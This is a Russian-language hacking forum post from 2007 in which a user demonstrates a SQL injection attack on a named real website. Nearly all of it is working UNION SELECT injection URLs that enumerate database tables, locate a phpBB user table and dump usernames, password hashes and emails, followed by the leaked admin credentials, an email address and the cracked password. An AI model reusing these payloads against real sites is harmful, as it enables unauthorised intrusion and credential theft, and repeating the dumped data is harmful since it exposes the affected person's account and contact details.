|
Познающий
Регистрация: 24.12.2006
Сообщений: 90
Провел на форуме:
1292655
Репутация:
168
|
|
сначала находим нужную таблицу
http://www.volga-astrakhan.ru/index.php3?act=paper&n=-25125+union+select+null,null,table_name,null,null+ from+Information_schema.tables+limit+28,1--
потом определяемся в какой базе она находится
/на сайте есть форум phpbb, а там есть таблица phpbb_users которая в 16 формате выгледит так 0x70687062625f7573657273/
http://www.volga-astrakhan.ru/index.php3?act=paper&n=-25125+union+select+null,null,table_schema,null,nul l+from+Information_schema.tables+where+table_name= 0x70687062625f7573657273+limit+0,1--
потом получаем данные из этой таблицы
http://www.volga-astrakhan.ru/index.php3?act=paper&n=-25125+union+select+null,null,concat(username,0x3a, user_password,0x3a,user_email,0x3a,user_icq),null, null+from+test_bakulina.phpbb_users+limit+1,1--
получаем
admin:e10adc3949ba59abbe56e057f20f883e:mica@sos-ru.com
расшифровываем хеш
e10adc3949ba59abbe56e057f20f883e:123456
ставим мне +))))
Последний раз редактировалось big_BRAT; 29.09.2007 в 11:45..
|